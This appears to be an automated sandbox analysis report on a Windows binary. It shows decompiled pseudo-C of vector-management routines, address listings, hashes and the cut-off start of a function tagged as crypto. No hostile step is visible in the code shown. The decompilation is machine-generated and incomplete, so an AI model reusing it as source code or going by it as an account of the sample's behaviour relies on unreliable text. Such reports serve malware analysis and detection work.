						E00482410( *(_t745 + 0x68) +  *(_t481 - 0x1c) * 4,  *(_t745 + 0x6c));
						_t662 =  *(_t745 + 0x7c);
						_t703 =  *(_t745 + 0x78) +  *(_t481 - 0x18) * 4;
						_t749 = _t748 + 8;
						while(_t703 != _t662) {
							_t549 =  *_t703;
							_t703 = _t703 + 4;
							if(_t549 != 0) {
								 *((intOrPtr*)( *((intOrPtr*)( *_t549))))(1);
							}
						}
						_t509 =  *(_t745 + 0x8c);
						_t664 =  *((intOrPtr*)(_t745 + 0x88)) +  *(_t481 - 0x14) * 4;
						 *(_t749 + 0x14) = _t509;
						while(_t664 != _t509) {
							_t724 =  *_t664;
							_t664 = _t664 + 4;
							if(_t724 != 0) {
								E0046F240(_t724);
								_push(_t724);
								L004EEDBE();
								_t509 =  *(_t749 + 0x18);
								_t749 = _t749 + 4;
							}
						}
						_t704 =  *(_t481 - 0x10);
						while(_t704 <  *((intOrPtr*)(_t745 + 0x9c)) -  *((intOrPtr*)(_t745 + 0x98)) >> 2) {
							_push( *((intOrPtr*)( *((intOrPtr*)(_t745 + 0x98)) + _t704 * 4)));
							L004EEDBE();
							_t704 = _t704 + 1;
							_t749 = _t749 + 4;
						}
						_t510 =  *(_t745 + 0x6c);
						_t705 =  *(_t745 + 0x68);
						_t610 =  *(_t481 - 0x1c);
						_t333 = _t510 - _t705 >> 2;
						 *(_t749 + 0x14) = _t610;
						if(_t333 <= _t610) {
							L119:
							if(__eflags >= 0) {
								goto L140;
							} else {
								_t535 = _t610 - _t333;
								__eflags = 0x3fffffff - _t535 - _t333;
								if(0x3fffffff - _t535 < _t333) {
									_t333 = E004EE38E("vector<T> too long");
								}
								_t371 = _t333 + _t535;
								_t538 =  *((intOrPtr*)(_t745 + 0x70)) - _t705 >> 2;
								__eflags = _t371 - _t538;
								if(_t371 <= _t538) {
									L137:
									_t675 =  *(_t745 + 0x6c);
									_t540 = _t610 - (_t675 -  *(_t745 + 0x68) >> 2);
									__eflags = _t540;
									if(_t540 != 0) {
										__eflags = 0;
										memset(_t675, 0, _t540 << 2);
										_t749 = _t749 + 0xc;
									}
									_t375 =  *(_t745 + 0x6c);
									_t616 = _t610 - (_t375 -  *(_t745 + 0x68) >> 2);
									__eflags = _t616;
									 *(_t745 + 0x6c) = _t375 + _t616 * 4;
									goto L140;
								} else {
									_t720 = _t538;
									_t678 = _t720 >> 1;
									__eflags = 0x3fffffff - _t678 - _t720;
									if(0x3fffffff - _t678 >= _t720) {
										_t721 = _t720 + _t678;
										__eflags = _t721;
									} else {
										_t721 = 0;
									}
									__eflags = _t721 - _t371;
									if(_t721 < _t371) {
										_t721 = _t371;
									}
									__eflags = _t721 - 0x3fffffff;
									if(_t721 > 0x3fffffff) {
										E004EE38E("vector<T> too long");
									}
									__eflags = _t538 - _t721;
									if(_t538 >= _t721) {
										L136:
										_t481 =  *(_t749 + 0x18);
										goto L137;
									} else {
										__eflags = _t721;
										if(__eflags == 0) {
											L133:
											E004EF0C0(0,  *(_t745 + 0x68), ( *(_t745 + 0x6c) -  *(_t745 + 0x68) >> 2) * 4);
											_t382 =  *(_t745 + 0x68);
											_t749 = _t749 + 0xc;
											_t681 =  *(_t745 + 0x6c) - _t382 >> 2;
											__eflags = _t382;
											if(_t382 != 0) {
												_push(_t382);
												L004EEDBE();
												_t749 = _t749 + 4;
											}
											_t610 =  *(_t749 + 0x14);
											 *((intOrPtr*)(_t745 + 0x70)) = 0 + _t721 * 4;
											 *(_t745 + 0x6c) = 0 + _t681 * 4;
											 *(_t745 + 0x68) = 0;
											goto L136;
										} else {
											_push(_t721 * 4);
											_t481 = L004EF8DA(0, _t721 * 4, _t610, _t678, _t721, __eflags);
											_t749 = _t749 + 4;
											__eflags = _t481;
											if(_t481 == 0) {
												 *(_t749 + 0x20) = 0;
												 *(_t749 + 0x1c) = 0x52fd98;
												_t706 = _t749 + 0x1c;
												 *((intOrPtr*)(_t749 + 0x3c)) = 3;
												_t336 = E00404190(_t706);
												goto L144;
											} else {
												goto L133;
											}
										}
									}
								}
							}
						} else {
							_t722 = _t705 + _t610 * 4;
							if(_t722 != _t510) {
								_t682 = (_t510 - _t510 >> 2) * 4;
								E004EF0C0(_t722, _t510, _t682);
								_t749 = _t749 + 0xc;
								 *(_t745 + 0x6c) = _t722 + _t682;
							}
							L140:
							_t511 =  *(_t745 + 0x7c);
							_t706 =  *(_t745 + 0x78);
							_t610 =  *(_t481 - 0x18);
							_t336 = _t511 - _t706 >> 2;
							 *(_t749 + 0x14) = _t610;
							if(_t336 <= _t610) {
								L144:
								if(__eflags >= 0) {
									goto L165;
								} else {
									_t517 = _t610 - _t336;
									__eflags = 0x3fffffff - _t517 - _t336;
									if(0x3fffffff - _t517 < _t336) {
										_t336 = E004EE38E("vector<T> too long");
									}
									_t343 = _t336 + _t517;
									_t520 =  *((intOrPtr*)(_t745 + 0x80)) - _t706 >> 2;
									__eflags = _t343 - _t520;
									if(_t343 <= _t520) {
										L162:
										_t668 =  *(_t745 + 0x7c);
										_t522 = _t610 - (_t668 -  *(_t745 + 0x78) >> 2);
										__eflags = _t522;
										if(_t522 != 0) {
											__eflags = 0;
											memset(_t668, 0, _t522 << 2);
											_t749 = _t749 + 0xc;
										}
										_t347 =  *(_t745 + 0x7c);
										_t612 = _t610 - (_t347 -  *(_t745 + 0x78) >> 2);
										__eflags = _t612;
										_t610 = _t347 + _t612 * 4;
										 *(_t745 + 0x7c) = _t347 + _t612 * 4;
										goto L165;
									} else {
										_t670 = _t520;
										_t711 = _t670 >> 1;
										__eflags = 0x3fffffff - _t711 - _t670;
										if(0x3fffffff - _t711 >= _t670) {
											_t671 = _t670 + _t711;
											__eflags = _t671;
										} else {
											_t671 = 0;
										}
										__eflags = _t671 - _t343;
										if(_t671 < _t343) {
											_t671 = _t343;
										}
										__eflags = _t671 - 0x3fffffff;
										if(_t671 > 0x3fffffff) {
											E004EE38E("vector<T> too long");
										}
										__eflags = _t520 - _t671;
										if(_t520 >= _t671) {
											L161:
											_t481 =  *(_t749 + 0x18);
											goto L162;
										} else {
											_t485 = 0;
											__eflags = _t671;
											if(__eflags == 0) {
												L158:
												E004EF0C0(_t485,  *(_t745 + 0x78), ( *(_t745 + 0x7c) -  *(_t745 + 0x78) >> 2) + ( *(_t745 + 0x7c) -  *(_t745 + 0x78) >> 2) + ( *(_t745 + 0x7c) -  *(_t745 + 0x78) >> 2) + ( *(_t745 + 0x7c) -  *(_t745 + 0x78) >> 2));
												_t352 =  *(_t745 + 0x78);
												_t749 = _t749 + 0xc;
												_t714 =  *(_t745 + 0x7c) - _t352 >> 2;
												__eflags = _t352;
												if(_t352 != 0) {
													_push(_t352);
													L004EEDBE();
													_t749 = _t749 + 4;
												}
												 *((intOrPtr*)(_t745 + 0x80)) = _t485 + _t671 * 4;
												_t610 =  *(_t749 + 0x14);
												 *(_t745 + 0x7c) = _t485 + _t714 * 4;
												 *(_t745 + 0x78) = _t485;
												goto L161;
											} else {
												_push(_t671 * 4);
												_t485 = L004EF8DA(0, _t520, _t610, _t671, _t711, __eflags);
												_t749 = _t749 + 4;
												__eflags = _t485;
												if(_t485 == 0) {
													 *(_t749 + 0x28) = 0;
													 *(_t749 + 0x24) = 0x52fd98;
													_t715 = _t749 + 0x24;
													 *((intOrPtr*)(_t749 + 0x3c)) = 4;
													_t357 = E00404190(_t715);
													asm("int3");
													asm("int3");
													asm("int3");
													asm("int3");
													asm("int3");
													asm("int3");
													asm("int3");
													asm("int3");
													asm("int3");
													asm("int3");
													asm("int3");
													asm("int3");
													asm("int3");
													asm("int3");
													_t751 = _t749 - 8;
													__eflags =  *((intOrPtr*)(_t357 + 0x14)) - 0x10;
													if(__eflags >= 0) {
														_t357 =  *_t357;
													}
													_push(_t715);
													_t716 = _t520;
													 *((intOrPtr*)(_t751 + 8)) = _t357;
													L00482B80(_t716 + 0xa8, _t751 + 4, __eflags, _t751 + 0xc, _t751 + 4);
													_t360 =  *((intOrPtr*)(_t751 + 8));
													__eflags = _t360 -  *((intOrPtr*)(_t716 + 0xac));
													if(_t360 ==  *((intOrPtr*)(_t716 + 0xac))) {
														L173:
														 *_t671 =  *0x55ff0c;
														 *((intOrPtr*)(_t671 + 4)) =  *0x55ff10;
														return _t671;
													} else {
														_t363 = _t360 + 0xc;
														__eflags = _t363;
														if(_t363 != 0) {
															 *((intOrPtr*)(_t671 + 4)) =  *((intOrPtr*)(_t363 + 4));
															 *_t671 =  *_t363;
															return _t671;
														} else {
															goto L173;
														}
													}
												} else {
													goto L158;
												}
											}
										}
									}
								}
							} else {
								_t718 = _t706 + _t610 * 4;
								if(_t718 != _t511) {
									_t672 = (_t511 - _t511 >> 2) * 4;
									E004EF0C0(_t718, _t511, _t672);
									_t749 = _t749 + 0xc;
									 *(_t745 + 0x7c) = _t718 + _t672;
								}
								L165:
								L0047FCD0( *(_t481 - 0x14), _t745 + 0x88);
								L0047FCD0( *(_t481 - 0x10), _t745 + 0x98);
								_t341 =  *(_t745 + 0x114);
								if( *((intOrPtr*)(_t745 + 0x110)) != _t341) {
									 *(_t745 + 0x114) = _t341;
								}
								 *[fs:0x0] =  *((intOrPtr*)(_t749 + 0x34));
								_pop(_t665);
								_pop(_t709);
								_pop(_t482);
								return L004EEDC9(_t341, _t482,  *(_t749 + 0x18) ^ _t749, _t610, _t665, _t709);
							}
						}
					}
				}
			}

0x0046f4b0
0x0046f4b0
0x0046f4b2
0x0046f4bd
0x0046f4be
0x0046f4c1
0x0046f4c8
0x0046f4cc
0x0046f4cf
0x0046f4d0
0x0046f4d7
0x0046f4dc
0x0046f4e2
0x0046f4e6
0x0046f4f4
0x0046f500
0x0046f504
0x0046f50a
0x0046f50e
0x0046f510
0x0046f516
0x0046f51c
0x0046f546
0x0046f546
0x0046f546
0x0046f548
0x0046f54c
0x0046f54c
0x0046f54f
0x0046f555
0x0046f567
0x0046f569
0x0046f570
0x0046f576
0x0046f57a
0x0046f57d
0x0046f57f
0x0046f582
0x0046f582
0x0046f584
0x0046f585
0x0046f585
0x0046f58b
0x0046f58d
0x0046f592
0x0046f594
0x0046f596
0x0046f59f
0x0046f5a0
0x0046f5a2
0x0046f5a2
0x0046f5b2
0x0046f5c3
0x0046f5c6
0x0046f5c6
0x0046f5c8
0x0046f5ca
0x0046f5ca
0x0046f5ca
0x0046f5d0
0x0046f5d5
0x0046f5d7
0x0046f5da
0x0046f5e3
0x0046f5e3
0x0046f5e3
0x0046f5e5
0x0046f5e8
0x0046f5ec
0x0046f5ef
0x0046f60e
0x0046f610
0x0046f614
0x0046f614
0x0046f5f1
0x0046f5f1
0x0046f5f3
0x0046f609
0x0046f5f5
0x0046f5f8
0x0046f600
0x0046f600
0x0046f5f3
0x0046f616
0x0046f619
0x0046f620
0x0046f627
0x0046f628
0x0046f62b
0x0046f630
0x0046f633
0x0046f633
0x0046f633
0x0046f633
0x0046f63a
0x0046f63a
0x0046f55b
0x0046f55d
0x0046f55d
0x0046f654
0x0046f658
0x0046f65e
0x0046f520
0x0046f524
0x0046f533
0x0046f538
0x0046f53c
0x0046f540
0x0046f544
0x00000000
0x00000000
0x00000000
0x0046f544
0x0046f65e
0x0046f674
0x0046f67a
0x0046f67e
0x0046f680
0x0046f686
0x0046f690
0x0046f6a3
0x0046f6a8
0x0046f6ac
0x0046f6b0
0x0046f6b4
0x0046f6b6
0x0046f6b6
0x0046f6b8
0x0046f6b6
0x0046f6bc
0x0046f6bf
0x0046f6c5
0x0046f6d7
0x0046f6d9
0x0046f6e0
0x0046f6e6
0x0046f6ea
0x0046f6ed
0x0046f6ef
0x0046f6f2
0x0046f6f2
0x0046f6f4
0x0046f6f5
0x0046f6f5
0x0046f6fb
0x0046f6fd
0x0046f702
0x0046f704
0x0046f706
0x0046f70f
0x0046f710
0x0046f712
0x0046f712
0x0046f722
0x0046f733
0x0046f736
0x0046f736
0x0046f738
0x0046f73a
0x0046f73a
0x0046f73a
0x0046f740
0x0046f745
0x0046f747
0x0046f74a
0x0046f753
0x0046f753
0x0046f753
0x0046f755
0x0046f758
0x0046f75c
0x0046f75f
0x0046f77e
0x0046f780
0x0046f784
0x0046f784
0x0046f761
0x0046f761
0x0046f763
0x0046f779
0x0046f765
0x0046f768
0x0046f770
0x0046f770
0x0046f763
0x0046f786
0x0046f789
0x0046f790
0x0046f797
0x0046f798
0x0046f79b
0x0046f7a0
0x0046f7a3
0x0046f7a3
0x0046f7a3
0x0046f7a3
0x0046f7aa
0x0046f7aa
0x0046f6cb
0x0046f6cd
0x0046f6cd
0x0046f7c4
0x0046f7c8
0x0046f7cc
0x0046f690
0x0046f7e4
0x0046f7ec
0x0046f7ee
0x0046f800
0x0046f80e
0x0046f823
0x0046f834
0x0046f838
0x0046f800
0x0046f83c
0x0046f842
0x0046f84c
0x0046f853
0x0046f856
0x0046f85c
0x0046f88f
0x00000000
0x0046f895
0x0046f897
0x0046f8a0
0x0046f8a2
0x0046f8a9
0x0046f8a9
0x0046f8ae
0x0046f8b8
0x0046f8bb
0x0046f8bd
0x0046f973
0x0046f973
0x0046f986
0x0046f986
0x0046f988
0x0046f98a
0x0046f98c
0x0046f98c
0x0046f98c
0x0046f98e
0x0046f99f
0x0046f99f
0x0046f9a4
0x00000000
0x0046f8c3
0x0046f8c3
0x0046f8c7
0x0046f8d0
0x0046f8d2
0x0046f8d8
0x0046f8d8
0x0046f8d4
0x0046f8d4
0x0046f8d4
0x0046f8da
0x0046f8dc
0x0046f8de
0x0046f8de
0x0046f8e0
0x0046f8e6
0x0046f8ed
0x0046f8ed
0x0046f8f2
0x0046f8f4
0x00000000
0x0046f8f6
0x0046f8f6
0x0046f8f8
0x0046f8fa
0x0046f916
0x0046f931
0x0046f936
0x0046f944
0x0046f947
0x0046f94a
0x0046f94c
0x0046f94e
0x0046f94f
0x0046f954
0x0046f954
0x0046f957
0x0046f961
0x0046f967
0x0046f96d
0x00000000
0x0046f8fc
0x0046f903
0x0046f909
0x0046f90b
0x0046f90e
0x0046f910
0x0046f9fd
0x0046fa05
0x0046fa0d
0x0046fa11
0x0046fa19
0x00000000
0x00000000
0x00000000
0x00000000
0x0046f910
0x0046f8fa
0x0046f8f4
0x0046f8bd
0x0046f85e
0x0046f85e
0x0046f863
0x0046f870
0x0046f87a
0x0046f87f
0x0046f884
0x0046f884
0x0046f9aa
0x0046f9ae
0x0046f9b1
0x0046f9b7
0x0046f9c1
0x0046f9c4
0x0046f9ca
0x0046fa1e
0x0046fa1e
0x00000000
0x0046fa24
0x0046fa26
0x0046fa2f
0x0046fa31
0x0046fa38
0x0046fa38
0x0046fa3d
0x0046fa47
0x0046fa4a
0x0046fa4c
0x0046fb02
0x0046fb02
0x0046fb15
0x0046fb15
0x0046fb17
0x0046fb19
0x0046fb1b
0x0046fb1b
0x0046fb1b
0x0046fb1d
0x0046fb2e
0x0046fb2e
0x0046fb33
0x00000000
0x0046fa52
0x0046fa52
0x0046fa56
0x0046fa5f
0x0046fa61
0x0046fa67
0x0046fa67
0x0046fa63
0x0046fa63
0x0046fa63
0x0046fa69
0x0046fa6b
0x0046fa6d
0x0046fa6d
0x0046fa6f
0x0046fa75
0x0046fa7c
0x0046fa7c
0x0046fa81
0x0046fa83
0x00000000
0x0046fa85
0x0046fa87
0x0046fa89
0x0046faa5
0x0046fac0
0x0046fac5
0x0046fad3
0x0046fad6
0x0046fad9
0x0046fadb
0x0046fadd
0x0046fade
0x0046fae3
0x0046fae3
0x0046fae6
0x0046faf0
0x0046faf6
0x0046fafc
0x00000000
0x0046fa8b
0x0046fa92
0x0046fa98
0x0046fa9a
0x0046fa9d
0x0046fa9f
0x0046fc42
0x0046fc4a
0x0046fc52
0x0046fc56
0x0046fc5e
0x00000000
0x00000000
0x00000000
0x00000000
0x0046fa9f
0x0046fa89
0x0046fa83
0x0046fa4c
0x0046f9cc
0x0046f9cc
0x0046f9d1
0x0046f9de
0x0046f9e8
0x0046f9ed
0x0046f9f2
0x0046f9f2
0x0046fb39
0x0046fb39
0x0046fb46
0x0046fb59
0x0046fb64
0x0046fb67
0x0046fb6a
0x0046fb6f
0x0046fb71
0x0046fb73
0x0046fb78
0x0046fb80
0x0046fb80
0x0046fb82
0x0046fb8f
0x0046fb95
0x0046fb98
0x0046fb9e
0x0046fba0
0x0046fba2
0x0046fba7
0x0046fbaa
0x0046fbaf
0x0046fbb0
0x0046fbb5
0x0046fbb9
0x0046fbb9
0x0046fbbc
0x0046fbcc
0x0046fbd4
0x0046fbdf
0x0046fbe0
0x0046fbf1
0x0046fbf5
0x0046fbf8
0x0046fbfc
0x0046fbff
0x0046fc02
0x0046fc09
0x0046fc0c
0x0046fc12
0x0046fc63
0x0046fc63
0x00000000
0x0046fc69
0x0046fc6b
0x0046fc74
0x0046fc76
0x0046fc7d
0x0046fc7d
0x0046fc82
0x0046fc89
0x0046fc8c
0x0046fc8e
0x0046fd33
0x0046fd33
0x0046fd40
0x0046fd40
0x0046fd42
0x0046fd44
0x0046fd46
0x0046fd46
0x0046fd46
0x0046fd48
0x0046fd53
0x0046fd53
0x0046fd58
0x00000000
0x0046fc94
0x0046fc94
0x0046fc98
0x0046fca1
0x0046fca3
0x0046fca9
0x0046fca9
0x0046fca5
0x0046fca5
0x0046fca5
0x0046fcab
0x0046fcad
0x0046fcaf
0x0046fcaf
0x0046fcb1
0x0046fcb7
0x0046fcbe
0x0046fcbe
0x0046fcc3
0x0046fcc5
0x0046fd2f
0x0046fd2f
0x00000000
0x0046fcc7
0x0046fcc9
0x0046fccb
0x0046fce7
0x0046fcfc
0x0046fd01
0x0046fd09
0x0046fd0c
0x0046fd0f
0x0046fd11
0x0046fd13
0x0046fd14
0x0046fd19
0x0046fd19
0x0046fd1c
0x0046fd26
0x0046fd29
0x0046fd2c
0x00000000
0x0046fccd
0x0046fcd4
0x0046fcda
0x0046fcdc
0x0046fcdf
0x0046fce1
0x0046fda1
0x0046fda9
0x0046fdb1
0x0046fdb5
0x0046fdbd
0x00000000
0x00000000
0x00000000
0x00000000
0x0046fce1
0x0046fccb
0x0046fcc5
0x0046fc8e
0x0046fc14
0x0046fc14
0x0046fc19
0x0046fc26
0x0046fc30
0x0046fc35
0x0046fc3a
0x0046fc3a
0x0046fd5b
0x0046fd5b
0x0046fd5e
0x0046fd61
0x0046fd68
0x0046fd6b
0x0046fd71
0x0046fdc2
0x0046fdc2
0x00000000
0x0046fdc8
0x0046fdca
0x0046fdd3
0x0046fdd5
0x0046fddc
0x0046fddc
0x0046fde1
0x0046fdeb
0x0046fdee
0x0046fdf0
0x0046fe95
0x0046fe95
0x0046fea2
0x0046fea2
0x0046fea4
0x0046fea6
0x0046fea8
0x0046fea8
0x0046fea8
0x0046feaa
0x0046feb5
0x0046feb5
0x0046feb7
0x0046feba
0x00000000
0x0046fdf6
0x0046fdf6
0x0046fdfa
0x0046fe03
0x0046fe05
0x0046fe0b
0x0046fe0b
0x0046fe07
0x0046fe07
0x0046fe07
0x0046fe0d
0x0046fe0f
0x0046fe11
0x0046fe11
0x0046fe13
0x0046fe19
0x0046fe20
0x0046fe20
0x0046fe25
0x0046fe27
0x0046fe91
0x0046fe91
0x00000000
0x0046fe29
0x0046fe29
0x0046fe2b
0x0046fe2d
0x0046fe49
0x0046fe5b
0x0046fe60
0x0046fe68
0x0046fe6b
0x0046fe6e
0x0046fe70
0x0046fe72
0x0046fe73
0x0046fe78
0x0046fe78
0x0046fe81
0x0046fe87
0x0046fe8b
0x0046fe8e
0x00000000
0x0046fe2f
0x0046fe36
0x0046fe3c
0x0046fe3e
0x0046fe41
0x0046fe43
0x0046ff11
0x0046ff19
0x0046ff21
0x0046ff25
0x0046ff2d
0x0046ff32
0x0046ff33
0x0046ff34
0x0046ff35
0x0046ff36
0x0046ff37
0x0046ff38
0x0046ff39
0x0046ff3a
0x0046ff3b
0x0046ff3c
0x0046ff3d
0x0046ff3e
0x0046ff3f
0x0046ff40
0x0046ff43
0x0046ff47
0x0046ff49
0x0046ff49
0x0046ff4b
0x0046ff4c
0x0046ff57
0x0046ff62
0x0046ff67
0x0046ff6b
0x0046ff72
0x0046ff79
0x0046ff84
0x0046ff86
0x0046ff8e
0x0046ff74
0x0046ff74
0x0046ff74
0x0046ff77
0x0046ff94
0x0046ff97
0x0046ff9e
0x00000000
0x00000000
0x00000000
0x0046ff77
0x00000000
0x00000000
0x00000000
0x0046fe43
0x0046fe2d
0x0046fe27
0x0046fdf0
0x0046fd73
0x0046fd73
0x0046fd78
0x0046fd85
0x0046fd8f
0x0046fd94
0x0046fd99
0x0046fd99
0x0046febd
0x0046fec6
0x0046fed4
0x0046fed9
0x0046fee5
0x0046feea
0x0046feea
0x0046fef4
0x0046fefc
0x0046fefd
0x0046feff
0x0046ff0e
0x0046ff0e
0x0046fd71
0x0046fc12
0x0046f9ca

APIs

_memmove.LIBCMT ref: 0046F87A

Strings

vector<T> too long, xrefs: 0046F8A4, 0046F8E8, 0046FA33, 0046FA77, 0046FC78, 0046FCB9, 0046FDD7, 0046FE1B

Memory Dump Source

Source File: 00000000.00000002.259489856.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.259327477.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.263030676.00000000004F0000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.263045725.00000000004F2000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.263130751.0000000000521000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.263274480.0000000000559000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.263305880.000000000055A000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.263329525.0000000000562000.00000002.00020000.sdmp Download File

Similarity

API ID: _memmove
String ID: vector<T> too long
API String ID: 4104443479-3788999226
Opcode ID: f9e87e0ba29f0d1135848d1733719e4a1e5762b55f3bd5655fdf58d46fc8d428
Instruction ID: d0d6cdf60a9ef9b4368b497eaac4b4b49dba12012e7857ce0edd8c25d089ac67
Opcode Fuzzy Hash: f9e87e0ba29f0d1135848d1733719e4a1e5762b55f3bd5655fdf58d46fc8d428
Instruction Fuzzy Hash: 7C62C4716002058FCB28DF29D9915AE77E1BB88314F14463EEC9697395FB34EE09CB86

Uniqueness

Uniqueness Score: -1.00%

Function 00478010, Relevance: 27.2, APIs: 10, Strings: 5, Instructions: 918
COMMONCrypto

Download Yara Rule

C-Code - Quality: 86%

			E00478010(unsigned int __ecx, void* __edx) {
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t384;
				signed int _t386;
				unsigned int _t389;
				unsigned int _t391;
				void* _t398;
				intOrPtr _t405;
				signed int _t408;
				signed int _t411;
				unsigned int _t416;
				unsigned int _t422;
				intOrPtr* _t430;
				intOrPtr* _t433;
				intOrPtr* _t436;
				intOrPtr* _t439;
				intOrPtr _t446;
				signed int _t448;
				intOrPtr* _t452;
				intOrPtr* _t454;
				intOrPtr* _t457;
				intOrPtr* _t460;
				intOrPtr _t466;
				signed int _t475;
				signed int _t476;
				signed int _t478;
				signed int _t479;
				signed int _t486;
				signed int _t487;
				signed int _t489;
				signed int _t493;
				signed int _t495;
				signed int _t496;
				signed int _t503;
				signed int _t504;
				unsigned int _t506;
				void* _t510;
				unsigned int _t511;
				signed int _t512;
				signed int _t514;
				signed int _t515;
				unsigned int _t518;
				signed int _t520;
				signed int _t521;
				signed int _t526;
				unsigned int _t527;
				signed int _t528;
				signed int _t530;
				signed int _t531;
				unsigned int _t534;
				signed int _t536;
				signed int _t537;
				unsigned int _t541;
				signed int _t542;
				void* _t545;
				signed int _t547;
				unsigned int* _t548;
				signed int _t559;
				signed int _t560;
				void* _t561;
				signed int _t562;
				intOrPtr* _t564;
				unsigned int _t565;
				unsigned int _t583;
				intOrPtr _t585;
				intOrPtr _t587;
				intOrPtr _t590;
				void* _t592;
				intOrPtr _t599;
				intOrPtr _t600;
				intOrPtr _t603;
				void* _t605;
				intOrPtr _t613;
				unsigned int _t615;
				intOrPtr _t620;
				unsigned int _t623;
				signed int _t624;
				unsigned int _t630;
				unsigned int _t632;
				signed int _t633;
				unsigned int _t635;
				unsigned int _t638;
				signed int _t639;
				unsigned int _t642;
				unsigned int _t644;
				signed int _t645;
				unsigned int _t647;
				unsigned int _t650;
				signed int _t651;
				void* _t657;
				void* _t664;
				void* _t665;
				void* _t666;
				intOrPtr _t667;
				void* _t674;
				void* _t675;
				intOrPtr _t676;
				void* _t687;
				intOrPtr _t689;
				unsigned int _t691;
				signed int _t695;
				intOrPtr* _t696;
				unsigned int _t698;
				signed int _t705;
				unsigned int _t707;
				signed int _t711;
				unsigned int _t713;
				unsigned int _t715;
				intOrPtr _t716;
				signed int _t717;
				signed int _t718;
				void* _t719;
				unsigned int _t721;
				void* _t724;
				signed int _t730;
				signed int _t731;
				signed int _t737;
				unsigned int _t740;
				unsigned int _t745;
				intOrPtr _t752;
				signed int _t753;
				intOrPtr _t754;
				signed int _t755;
				intOrPtr _t756;
				intOrPtr _t757;
				signed int _t758;
				void* _t759;
				signed int _t760;
				signed int _t761;
				signed int _t762;
				signed int _t763;
				unsigned int* _t766;
				void* _t767;
				unsigned int* _t768;
				unsigned int _t771;
				void* _t773;
				signed int _t774;

				_t657 = __edx;
				_push(0xffffffff);
				_push(0x51b1ec);
				_push( *[fs:0x0]);
				_t774 = _t773 - 0x388;
				_t384 =  *0x5596fc; // 0x9d48295
				 *(_t774 + 0x380) = _t384 ^ _t774;
				_t386 =  *0x5596fc; // 0x9d48295
				_push(_t386 ^ _t774);
				 *[fs:0x0] = _t774 + 0x39c;
				_t389 =  *(_t774 + 0x3b0);
				_t559 =  *(_t774 + 0x3ac);
				_t771 =  *(_t774 + 0x3b4);
				_t715 = __ecx;
				 *(_t774 + 0x1c) = __ecx;
				 *(_t774 + 0x30) = _t559;
				 *(_t774 + 0x24) = _t389;
				 *(_t774 + 0x28) = 0;
				_t776 = _t389;
				if(_t389 == 0) {
					_t389 =  *(__ecx + 0x3c);
				}
				_t568 =  *((intOrPtr*)(_t715 + 4));
				_t391 = E004704E0(_t559, _t776,  *((intOrPtr*)(_t715 + 4)),  *((intOrPtr*)(_t389 + 4)));
				_t777 =  *((intOrPtr*)(_t391 + 0x10));
				 *(_t774 + 0x14) = _t391;
				if( *((intOrPtr*)(_t391 + 0x10)) != 0) {
					L00409B50(_t559, _t568, _t657, _t391, 1, 0x2e);
				}
				L00407CA0( *(_t559 + 8) | 0xffffffff, _t657,  *(_t774 + 0x14), _t771,  *(_t559 + 8), 0);
				_push( *(_t774 + 0x14));
				_push(_t715);
				E00476860(_t559,  *(_t559 + 8));
				_t398 = E004704E0(_t559, _t777,  *((intOrPtr*)(_t715 + 4)),  *(_t559 + 8));
				_t570 =  *(_t774 + 0x14);
				 *_t771 = _t398;
				 *(_t771 + 4) =  *(_t774 + 0x14);
				_t659 =  *(_t715 + 0x3c);
				 *(_t771 + 0xc) =  *(_t774 + 0x24);
				 *(_t771 + 8) =  *(_t715 + 0x3c);
				 *((short*)(_t771 + 0x14)) = 0;
				 *(_t771 + 0x18) =  *(_t559 + 0x10);
				_t401 =  *(_t559 + 0x10);
				_t752 =  *((intOrPtr*)(_t715 + 4));
				_t405 =  *(_t559 + 0x10) + _t401 * 8 +  *(_t559 + 0x10) + _t401 * 8 +  *(_t559 + 0x10) + _t401 * 8 +  *(_t559 + 0x10) + _t401 * 8 +  *(_t559 + 0x10) + _t401 * 8 +  *(_t559 + 0x10) + _t401 * 8 +  *(_t559 + 0x10) + _t401 * 8 +  *(_t559 + 0x10) + _t401 * 8;
				_t778 = _t405;
				if(_t405 != 0) {
					_push(_t405);
					 *(_t774 + 0x1c) = L004EF8DA(_t559, _t570, _t659, _t715, _t752, _t778);
					_t774 = _t774 + 4;
					_t35 = _t752 + 0x98; // 0x9c
					L00482890(_t774 + 0x18, _t35);
					_t405 =  *(_t774 + 0x18);
					_t715 =  *(_t774 + 0x1c);
				}
				_t753 = 0;
				 *((intOrPtr*)(_t771 + 0x1c)) = _t405;
				if( *(_t559 + 0x10) <= 0) {
					L9:
					 *(_t771 + 0x20) =  *(_t559 + 0x30);
					_t754 =  *((intOrPtr*)(_t715 + 4));
					_t408 =  *(_t559 + 0x30) << 6;
					_t781 = _t408;
					if(_t408 == 0) {
						L21:
						_t755 = 0;
						 *(_t771 + 0x24) = _t408;
						if( *(_t559 + 0x30) <= 0) {
							L24:
							 *(_t771 + 0x28) =  *(_t559 + 0x40);
							_t716 =  *((intOrPtr*)(_t715 + 4));
							_t411 =  *(_t559 + 0x40) << 5;
							_t789 = _t411;
							if(_t411 == 0) {
								L52:
								_t717 = 0;
								 *(_t771 + 0x2c) = _t411;
								if( *(_t559 + 0x40) <= 0) {
									L55:
									_t560 =  *(_t774 + 0x30);
									_t571 =  *(_t774 + 0x1c);
									 *((intOrPtr*)(_t771 + 0x30)) =  *((intOrPtr*)(_t560 + 0x50));
									_t756 =  *((intOrPtr*)( *(_t774 + 0x1c) + 4));
									_t416 =  *((intOrPtr*)(_t560 + 0x50)) +  *((intOrPtr*)(_t560 + 0x50)) +  *((intOrPtr*)(_t560 + 0x50)) +  *((intOrPtr*)(_t560 + 0x50)) +  *((intOrPtr*)(_t560 + 0x50)) +  *((intOrPtr*)(_t560 + 0x50)) +  *((intOrPtr*)(_t560 + 0x50)) +  *((intOrPtr*)(_t560 + 0x50));
									_t801 = _t416;
									if(_t416 == 0) {
										L83:
										_t718 = 0;
										 *(_t771 + 0x34) = _t416;
										if( *((intOrPtr*)(_t560 + 0x50)) <= 0) {
											L86:
											_t572 =  *(_t774 + 0x1c);
											 *(_t771 + 0x38) =  *(_t560 + 0x20);
											_t418 =  *(_t560 + 0x20);
